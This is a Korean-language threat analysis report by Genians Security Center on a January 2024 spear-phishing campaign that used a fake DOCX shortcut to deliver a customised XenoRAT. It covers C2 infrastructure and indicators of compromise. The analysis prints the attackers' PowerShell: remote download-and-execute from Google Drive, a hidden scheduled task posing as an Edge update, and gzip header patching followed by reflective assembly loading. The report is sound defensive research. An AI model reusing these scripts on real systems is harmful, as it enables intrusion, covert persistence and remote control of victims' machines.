◈ 주요 요약 (Executive Summary)
● 새해 첫날 공개된 언론사 오피니언 칼럼 내용으로 현혹해 접근
● 암호화된 ZIP 압축 파일에 워드패드 아이콘을 가진 악성 파일 포함
● 구글 드라이브 통해 리치 텍스트 포맷(RTF) 문서처럼 위장 공격
● 조작된 헤더의 GNU Gzip 파일을 통해 보안탐지 회피 전략 구사
● Genian EDR 위협 대응 솔루션의 XBA 탐지기술로 효과적 대응 가능
1. 개요 (Overview)
○ 지니언스 시큐리티 센터(이하 GSC)는 2024년 1월 3일(수) 수행된 새로운 위협 징후를 포착했습니다. 연초부터 한국을 겨냥한 국지적 스피어 피싱(Spear Phishing) 공격이 발생 중입니다. 본 위협 케이스는 새해 첫날 일부 언론사에 공개된 실제 오피니언 칼럼 내용을 이메일로 전달하는 형태로 진행됐습니다. 해당 내용에는 새해 인사와 함께 ZIP 압축 파일이 하나 첨부돼 있습니다.
○ 이 시기는 연휴가 막 끝난 시점으로 여러 기업들이 본격적으로 신년 업무에 돌입하던 때 입니다. GSC가 식별한 본 공격은 평일 주간 시간대에 진행됐고, 평소 알고지낸 지인 행세로 인사하듯 접근을 시도합니다. 사실 신년 초에는 새해맞이 안부 인사를 나누는 것이 매우 자연스러운 일입니다.
[그림 1] 스피어 피싱 공격 흐름도
2. 공격 시나리오 (Attack Scenario)
○ 위협 행위자의 초기 접근은 전형적인 스피어 피싱입니다. 이메일 기반의 접근이 꽤 오래되고 전통적 수법이지만, 공격자 입장에선 아직도 효율적 측면이 있어 보입니다. 물론, 사회공학적 기법을 극대화하기 위해 특수 관심사나 행사 등 상황에 맞춘 주제를 고려할 수 있습니다. 이번 공격의 경우 특정 언론사 홈페이지에 공개된 오피니언 칼럼 내용을 위협 미끼(Decoy)로 사용했습니다.
○ 일련의 흐름이 보기드문 방식으로 평가하기에 조금 어색할 수 있습니다. 하지만 신년에 공개된 실제 칼럼 내용을 도용한 것은 나름 사실적 묘사와 시기적절한 사례로 보기에 충분합니다. 피해 대상자의 경험상 평소 의심 및 경각심이 높다면 실행 단계별 과정에서 어느정도 위협 인지가 가능하므로, 정교한 미끼는 끝까지 중요한 요소입니다.
○ 겉으로 드러난 공격 정황을 살펴보면, 위협 행위자는 2024년 새해 건강 인사와 함께 10자리의 고유 비밀번호가 설정된 ZIP 압축 파일을 첨부했습니다. 이는 마치 보안 기능처럼 해석될 수 있지만, 사실은 방어 회피(Defense Evasion) 전술 목적이 큽니다.
[그림 2] 스피어 피싱 공격 화면 (일부 블러 처리)
○ 해당 ZIP 파일은 이메일 원문 자체에 첨부된 건 아니고, 보통 파일 크기가 큰 경우 사용되는 대용량 링크로 전달됐습니다. 실제 공격에 쓰인 압축파일은 2,472 바이트로 용량이 매우 작은 편에 속합니다.
○ 악성 파일을 첨부할 때 URL 링크 주소로 보내는 이유는 주로 보안 서비스 검사를 불편하게 하거나, 목적에 따라 파일을 교체 또는 제거가 상대적으로 용이한 측면이 있다고 보입니다.
3. 악성파일 분석 (Malware Analysis)
○ 해킹 메일에 첨부된 '2024년 새해, 남북미 3국 정상에게 드리는 메시지.zip' 압축 파일은 이메일 본문에 포함된 비밀번호로 압축 해제가 가능합니다.
○ 압축이 해제되면, '2024년 새해, 남북미 3국 정상에게 드리는 메시지.docx.lnk' 이름의 2중 확장자를 가진 바로가기(LNK) 타입의 악성 파일이 나타납니다. 예를들어, [파일명.docx.lnk] 형태처럼 2중 확장자를 가진 파일은 docx 부분이 마치 최종 확장자로 오해할 수 있습니다.
[그림 3] DOCX 문서로 위장된 LNK 악성파일 모습
○ 악성 LNK 파일의 경우 '서식있는 텍스트(RTF)'를 작성하는 워드패드(wordpad.exe) 아이콘을 가지고 있으며, 파일 속성에서 [아이콘 변경] 기능을 통해 내부 목록에서 선택할 수 있습니다. LNK 파일의 속성 정보를 통해 호출되는 PowerShell 명령은 아래와 같습니다. 내부에 삽입된 Base64 인코딩 값은 'zcnodcnewf(무작위 숫자).ps1' 파일로 디코딩 됩니다.
○ 한편, PowerShell의 실행 정책은(ExecutionPolicy) 구성 파일을 로드하고 스크립트 실행 조건을 제어하는 안전 기능입니다. 이 기능은 악성 스크립트의 실행을 방지할 수 있고, 환경조건에 따라 실행여부는 달라질 수 있습니다. 따라서 공격자는 보안 기능을 회피하는데 집중하는 편입니다. 이러한 전제조건은 PowerShell 실행 정책 값에 따라 변경될 수 있습니다.
/c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$vnsonafoncoaefwe =\"BASE64\";$bvoasnoncoecaew = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vnsonafoncoaefwe));$pvjpsadpocepncae = [System.IO.Path]::GetTempPath();$vncbibciwscACd = \"zcnodcnewf\"+(Get-Random) + '.ps1';$nvbiabsiudmnacose = Join-Path $pvjpsadpocepncae $vncbibciwscACd;$bvoasnoncoecaew | Out-File -FilePath $nvbiabsiudmnacose;&$nvbiabsiudmnacose"
iconlocation: %ProgramFiles%\\Windows NT\\Accessories\\wordpad.exe
|
[표 1] LNK 내부에 포함된 PowerShell 명령어 화면
○ BASE64 인코딩 데이터는 첫번째 '$filePath' 변수를 통해 임시경로(Temp)에 'swolf-first.ps1' PowerShell 파일명을 선언합니다. 'Invoke-WebRequest' 명령을 통해 지정된 구글 드라이브 주소에서 다운로드한 스크립트 내용을 '$str' 변수로 할당하고 UTF8 인코딩 파일로 저장합니다.
○ 참고로 'swolf'는 'Swim'과 'Golf'의 합성어로, 보통 수영의 효율성을 측정하는 수치입니다. 물론, 공격자가 사용한 이 용어의 정확한 의도는 아직 불명확합니다. 이어서 '$action' 변수에 새로운 예약 작업을 생성합니다. 이 작업은 PowerShell 명령을 실행하도록 설정되어 있으며, 숨겨진 창에서 실행하는 등의 옵션이 사용됩니다. 이 작업은 한 번 실행되며, 1분 후에 다시 실행됩니다. '$trigger' 변수는 예약 작업이 한 번 실행되고, 1시간마다 반복되도록 설정된 트리거를 생성합니다.
○ '$settings' 변수는 숨김 기능으로 예약 작업을 설정합니다. 그리고 'MicrosoftEdgeUpdateVersion' 문자로 작업 이름을 등록하여, 마치 MS 엣지 브라우저의 업데이트 버전처럼 위장합니다. 설명(Description) 부분에는 'Mirosoft Edge Update' 문구를 사용했는데, 'Microsoft' 표현에 알파벳 c 오탈자가 존재합니다.
$filePath = Join-Path ([System.IO.Path]::GetTempPath()) "\swolf-first.ps1"; $str = 'Invoke-Expression -Command ((Invoke-WebRequest -Uri "https://drive.google.com/uc?export=download&id=1j(일부생략)ry" -UseBasicParsing).Content)'; $str | Out-File -FilePath $filePath -Encoding UTF8 $action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$filePath = Join-Path ([System.IO.Path]::GetTempPath()) "\swolf-first.ps1"; Invoke-Expression $filePath;}"'; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 60); $settings = New-ScheduledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateVersion" -Action $action -Trigger $trigger -Description "Mirosoft Edge Update" -Settings $settings; $filePath = Join-Path ([System.IO.Path]::GetTempPath()) "\2024년 새해, 남북미 3국 정상에게 드리는 메시지.rtf"; Invoke-WebRequest -Uri "https://drive.google.com/uc?export=download&id=1X(일부생략)3d" -o "$filePath"; Start-Process -FilePath $filePath;
|
[표 2] BASE64 데이터의 PowerShell 명령어 화면
○ 두번째 '$filePath' 변수도 'Invoke-WebRequest' 명령을 통해 지정된 구글 드라이브 주소에서 '1.txt' 파일을 임시폴더(Temp) 경로로 다운로드하고, '2024년 새해, 남북미 3국 정상에게 드리는 메시지.rtf' 파일명으로 생성하고 실행합니다. 이 파일은 미끼용 문서 파일입니다.
○ 한편, 'swolf-first.ps1' PowerShell 명령을 통해 호출되는 구글 드라이브에는 2023년 12월 29일에 'calc.txt' 이름의 파일이 'fox tian' 계정의 소유자가 등록한 것을 알 수 있습니다. 'fox tian'은 본 위협 행위자가 사용한 계정명이며, 'tianfox67@gmail[.]com' 이메일 주소가 사용됐습니다.
[그림 4] 'fox tian' 계정으로 등록된 구글 드라이브 모습
○ 단순 텍스트 문서처럼 구글 드라이브에 파일이 등록돼 있지만, 실제로는 악성 PowerShell 명령이 삽입된 상태입니다.
○ 'calc.txt' 파일 내부에는 다음과 같은 명령어가 포함돼 있습니다.
function GzExtract
{[CmdletBinding()] Param ([Parameter(Position = 0, Mandatory = $True)] [byte[]] $byteArray = $(Throw("-byteArray is required")) ); Process { $input = New-Object System.IO.MemoryStream(, $byteArray );$output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress);$gzipStream.CopyTo( $output );$gzipStream.Close();$input.Close();[byte[]] $byteOutArray = $output.ToArray();return $byteOutArray;}}
Add-type -Assembly System.Drawing; Add-Type -Assembly System.Windows.Forms; Add-Type -Assembly PresentationCore; Add-Type -AssemblyName System.Windows.Forms; Add-type -AssemblyName System.Drawing;
$tempPath = [System.IO.Path]::GetTempPath(); $vncbibciwscACd = "\swolf-data"; $filePath = Join-Path $tempPath $vncbibciwscACd; Invoke-WebRequest -Uri "https://drive.google.com/uc?export=download&id=1Y(일부생략)DN" -o "$filePath"
[byte[]]$bytes = [System.IO.File]::ReadAllBytes($filePath); $bytes[0] = 0x1F; $bytes[1] = 0x8B; $bytes[2] = 0x08; $bytes[3] = 0x00; $bytes[4] = 0x00; $bytes[5] = 0x00; $bytes[6] = 0x00;
$length = $bytes.Length; [byte[]]$exBytes = GzExtract ($bytes); $length = $exBytes.Length; $assembly = [System.Reflection.Assembly]::Load($exBytes); $name = "Main"; foreach ($type in $assembly.GetTypes()){foreach ($method in $type.GetMethods()){if (($method.Name.ToLower()).equals($name.ToLower())){$method.Invoke($null, @());}}}
|
[표 3] 'calc.txt'내부의 PowerShell 명령어 화면
○ 'calc.txt' 파일에 포함된 PowerShell 명령은 또 다른 구글 드라이브 주소에서 'rc.rtf' 파일을 임시 폴더(Temp) 경로에 'swolf-data' 이름으로 저장합니다. 이전과 다르게 txt 문서가 아닌 rtf 문서처럼 위장한 특징이 있는데, 확장자 뿐만 아니라 파일 내부의 헤더 부분(File Magic Number)도 위장하고 있습니다.
○ PowerShell 명령은 마치 rtf 문서처럼 위장해 다운로드된 파일의 처음 7바이트를 [0x1F, 0x8B, 0x08, 0x00, 0x00, 0x00, 0x00] 값으로 수정합니다. 그리고 'GzExtract' 함수를 사용해 Gz 포맷으로 압축된 데이터를 해제합니다.
[그림 5] 파일 헤더 7바이트 수정 전후 비교 화면
○ 유형에 따라 파일들은 각각 고유한 포맷을 가지고 있는데, 여기서 기본이 되는 것이 'File Magic Number' 또는 'File Signature'라고 말합니다. 종류에 따라 파일 처음부분에 존재하는 경우와 마지막에 존재하는 경우도 있습니다. Gz 압축파일 시그니처 Hex 값은 [0x1F, 0x8B, 0x08] 입니다.
○ 압축 구조 내부에는 'cmdline.exe' 원본 이름을 가진 실행 파일이 존재하고, 최종 페이로드 기능을 수행하게 됩니다.
○ 결론부터 말하자면, 이번 공격에 쓰인 'cmdline.exe' 파일은 C#(.NET) 기반으로 개발된 'Custom XenoRAT' 입니다.
○ 참고로 XenoRAT은 2023년 10월에 1.0 버전이 릴리즈됐으며, 2024년 1월에 1.7.0 버전이 공개된 오픈소스 기반의 원격 제어 도구입니다. 도구 개발자는
GitHub 주소를 통해 프로그램 소개와 동시에 교육 목적으로 사용되어야 하고 법적, 윤리적 경계를 벗어나지 않도록 안내를 하고 있습니다. 하지만, 오픈 소스로 공개돼 있기 때문에 누구나 쉽게 악용할 소지가 있습니다.
superuser 사이트에 동일 깃허브 주소와 페이스북 링크 등이 공개돼 있는데, 개발자는 캐나다 토론토에 거주하며, C# 개발자 등으로 자신을 소개하고 있습니다. 또한, 동일한 아이디가 Breachforums, Hack Forums 사이트에 가입된 이력도 조회됩니다.
[그림 6] RAT 개발자 정보 화면 (일부 블러 처리)
○ 깃허브에 릴리즈된 XenoRAT Server 프로그램을 간략히 살펴보면, 자체 Builder 기능을 통해 다양한 조건으로 Client 파일을 제작할 수 있습니다.
[그림 7] XenoRAT Builder 기능 화면
○ 생성된 Client 파일이 실행되면 조건에 따라 XenoRAT Server 주소로 접속되고, 버전 및 사용자 정보가 출력됩니다.
[그림 8] RAT Client 접속 모습
○ 선택된 단말을 대상으로 BSOD 발생, 파일 탐색, 시스템 종료, 웹캠, 라이브 마이크, 키로거, 화면 제어 등 각종 원격제어 플러그인 기능을 수행할 수 있습니다. 특히, HVNC(Hidden Virtual Network Computing) 기능을 통해 대상 단말의 이용자 모르게 원격 제어를 수행할 수 있습니다.
[그림 9] 선택된 Client 대상 원격제어 기능 선택 화면
○ 한편, 'cmdline.exe' 파일은 XenoRAT 기본 함수와 거의 동일하지만, 'DllHandler' 함수가 'myHand' 함수명으로 커스텀 됐습니다. 그리고 명령제어(C2) 주소는 RemoteEndPoint 값으로 설정돼 있습니다.
○ 본 위협 사례에서 사용된 C2 서버는 독일소재의 159.100.29[.]38 아이피 주소가 사용됐으며, 포트명은 9999 입니다.
[그림 10] XenoRAT C2 주소 디버깅 모습
4. C2 서버 분석 (C2 Server Analysis)
○ 위협 인프라로 사용된 159.100.29[.]38 아이피는 분석 시점 기준 독일 소재로 조회가 됐습니다. GSC는 다양한 공개출처정보(OSINT) 기반 연관성 분석을 진행했습니다.
○ 먼저 바이러스토탈(VirusTotal) 기준으로 아이피 주소를 조회해 보면, 다양한 Passive DNS 도메인을 확인할 수 있습니다.
[그림 11] 바이러스토탈 아이피 조회 결과 화면
○ 2023년 7월부터 2024년 1월까지 '159.100.29[.]38' 서버에 연결됐던 'akites[.]site' 도메인의 Passive DNS 기준 아이피 주소는 총 6개 입니다.
[그림 12] 'akites[.]site' Passive DNS 조회 화면
○ 2024년 1월 24일에 독일 아이피 주소가 쓰였지만, 그 시점 이전에는 대부분 한국의 이호스트아이씨티 호스팅이 사용된 이력을 확인할 수 있습니다.
도메인 주소 |
아이피 주소 |
국가 코드 |
호스팅 |
akites[.]site |
159.100.29[.]38 |
독일[DE] |
Firstcolo GmbH |
27.255.75[.]153 |
한국[KR] |
Ehostict |
27.255.81[.]113 |
한국[KR] |
Ehostict |
27.255.81[.]73 |
한국[KR] |
Ehostict |
27.255.81[.]77 |
한국[KR] |
Ehostict |
61.97.251[.]248 |
한국[KR] |
Ehostict |
[표 4] 'akites[.]site' 도메인의 아이피 주소 이력
○ 27.255.75[.]153 아이피를 포함해 다수의 공통 주소로 연결됐던 'civilarys[.]store' 도메인 주소를 살펴보면 몇가지 새로운 주소가 더 확인됩니다.
도메인 주소 |
아이피 주소 |
국가 코드 |
호스팅 |
civilarys[.]store |
27.255.75[.]153 |
한국[KR] |
Ehostict |
27.255.75[.]158 |
한국[KR] |
Ehostict |
27.255.81[.]111 |
한국[KR] |
Ehostict |
27.255.81[.]113 |
한국[KR] |
Ehostict |
27.255.81[.]77 |
한국[KR] |
Ehostict |
61.97.251[.]248 |
한국[KR] |
Ehostict |
[표 5] 'civilarys[.]store' 도메인의 아이피 주소 이력
○ 각 아이피 주소로 연결됐던 이력을 조회해 보면 한국의 포털회사나 가상자산 거래소 등과 유사한 도메인을 확인할 수 있습니다. 그리고 일부 [한글 도메인]도 사용됐습니다.
아이피 주소 |
도메인 주소 |
27.255.75[.]153 |
naveralert[.]com |
navercafe[.]info |
naveralarm[.]com |
nidnaver[.]help |
nidnaver[.]info |
27.255.75[.]158 |
navecorps[.]com |
naverscorp[.]shop |
27.255.81[.]113 |
upbit2024.r-e[.]kr |
countrysvc.p-e[.]kr |
upbit-service.p-e[.]kr |
taxservice.p-e[.]kr |
kakaoteam[.]site |
navecorps[.]com |
navers[.]cc |
nsvc.우편물.서버[.]한국 |
nmail.네이버메일.온라인[.]한국 |
ned.새알림.서버[.]한국 |
61.97.251[.]248 |
mofamail[.]homes |
mofamail[.]shop |
kakaoaccouts[.]store |
cloudown[.]store |
navecorps[.]com |
kakaoteam[.]site |
[표 6] 각 아이피별 도메인 이력 조회 내역
○ 에이아이스페라(AI SPERA)에서 제공하는 '크리미널 아이피(Criminal IP)'는 IP 주소기반 위협 인텔리전스 검색엔진 입니다. 지난 해 기준 약 42억개 IP와 Domain 주소 등 사이버 자산 정보를 실시간 수집해 자체 위험도 산출 정보를 제공하고 있습니다.
○ GSC는 본 APT 공격에 사용된 독일 소재 아이피 159.100.29[.]38 C2 서버 주소를 '
Criminal IP'에서 조회했습니다. 2024년 1월 20일 기준, 웹 서버 메인 인덱스 파일이 보관된 것을 확인할 수 있었습니다.
○ 이 내용은 다른 OSINT 서비스에서 확인할 수 없었던 특별한 결과를 보여주었습니다. 이번 공격 시점이 1월 3일인 것을 감안할 때 실시간 자료 수집력에 놀라웠고, 본 위협 분석에 나름 흥미로운 단서가 됐습니다.
○ 당시 'Criminal IP'의 조회 리포트를 보면, 새세기라는 타이틀의 회사 소개 및 서비스 제공 내용이 고스란히 담겨 있습니다. 이 웹 페이지 내용은 일시적으로 노출됐던 것으로 관측되며, 현재는 'The future is beautyful' 오타(beautiful)가 포함된 문장만 보여지고 있습니다.
[그림 13] 'AI Spera'의 'Criminal IP' 조회 화면
○ 'Criminal IP' 조회 결과에 보여지는 html 페이지 내용을 추출해 웹 브라우저로 확인해 보면, 간략한 회사 소개 내용을 담고 있습니다.
[그림 14] 새세기 홈페이지로 소개됐던 인덱스 화면
○ 구글에서 '새세기'를 검색해 보면, 주로 북한과 관련된 내용이 보여지고 있습니다. 북한은 '4차 산업 혁명'을 '
새 세기 산업 혁명'으로 지칭하고 IT기술의 중요성을 강조하고 있는 것으로 알려져 있습니다.
[그림 15] '새세기' 키워드 구글 검색 결과 화면
○ 더불어 'Criminal IP' 조회 자료 중에 원격 데스크 톱(RDP) 프로토콜 검색 내용이 있고, 대상 서버의 운영체제(OS)와 컴퓨터 명 등이 포함돼 있습니다.
[그림 16] 'Criminal IP' RDP 프로토콜 조회 내용
○ RDP Target_Name 및 NetBIOS_Domain_Name, NetBIOS_Computer_Name 등이 'SRV48686075' 이름이 사용된 것을 알 수 있습니다. GSC는 이번 공격에 활용된 커스텀 XenoRAT 'cmdline.exe' 악성 파일에서 'SRV48686075' 계정이 포함된 것을 확인했습니다.
[그림 17] 'SRV48686075' 계정이 포함된 악성파일 PDB 모습
5. 결론 및 대응방법 (Conclusion)
○ 최근 국내에서 발생하는 APT 공격들은 PowerShell 명령을 통해 Fileless 형태로 은밀하게 작동하는 특징을 보이고 있습니다. 단말에 초기 유입된 악성 파일들은 보통 사전에 탐지 테스트를 거쳐 알려진 보안 제품의 패턴이나 시그니처에서 탐색되지 않도록 만들어 집니다. 따라서 이런 유형의 위협을 조기에 식별하기 위해 반드시 이상행위 단계를 감지할 수 있어야 합니다.
○ 지니언스 단말 이상행위 탐지 및 대응 솔루션인 Genian EDR 제품이 설치된 경우, 악성 PowerShell 명령을 통해 네트워크 접속이 이뤄질 경우 XBA 규칙을 통해 위협을 즉각적으로 탐지할 수 있습니다.
○ 앞서 기술한 실제 APT 공격을 재현한 결과, Genian EDR의 관리자는 위협 모니터링을 통해 구글 드라이브로의 네트워크 이상 접속을 식별할 수 있습니다.
[그림 18] PowerShell 네트워크 접속을 Genian EDR에 탐지된 모습
○ 위협 행위자가 단말 침투과정에 사용한 미끼(Decoy)용 문서 파일 생성 과정도 Genian EDR은 정확히 탐지할 수 있습니다. 이를 통해 초기 유입부터 공격 전체 흐름의 가시성을 파악하고, 보다 효율적인 위협 대응과 침해사고 조사를 수행할 수 있습니다.
[그림 19] 구글드라이브에서 다운로드된 rtf 미끼 파일 모습
○ PowerShell 명령과 XenoRAT 모듈로 진행된 네트워크 통신 과정을 Genian EDR 서비스를 통해 조기에 탐지할 수 있습니다. 이를 통해 보안 담당자는 후속 조치를 수행할 수 있습니다.
[그림 20 ] XenoRAT 통신 시도 행위 탐지
6. 주요 침해 지표 (Indicator of Compromise)
● MD5
2A40543F5B4B8CC1F4BD8993DF44708E
92A18B9AC4945B444466B9950CB83E10
ADE57773E415DB6265815DF636AA83E9
EC146031EDFE94B2965D32B384A4B54F
F32653EC5E26AD7DA610DFC194FB66BA
1E25FED1DAB0E2E4651FC51DB806A8B9
9E8BB11A8159EA5135DEF3895E7A5817
14F97F5F286B1BE0CA7213218B478466
9732AF12223214E121B0E693B2AB4E2C
BD07301E0B028887D61337F62FF24062
D94C3DFFCFFCF8591A8630A893DEFF5F
● IP
159.100.29[.]38
27.255.75[.]153
27.255.75[.]158
27.255.81[.]111
27.255.81[.]113
27.255.81[.]73
27.255.81[.]77
61.97.251[.]248
● Domain
cloudown[.]store
countrysvc.p-e[.]kr
kakaoaccouts[.]store
kakaoteam[.]site
mofamail[.]homes
mofamail[.]shop
navecorps[.]com
naveralarm[.]com
naveralert[.]com
navercafe[.]info
navers[.]cc
naverscorp[.]shop
ned.새알림.서버[.]한국
nidnaver[.]help
nidnaver[.]info
nmail.네이버메일.온라인[.]한국
nsvc.우편물.서버[.]한국
taxservice.p-e[.]kr
upbit-service.p-e[.]kr
upbit2024.r-e[.]kr
● Email
tianfox67@gmail[.]com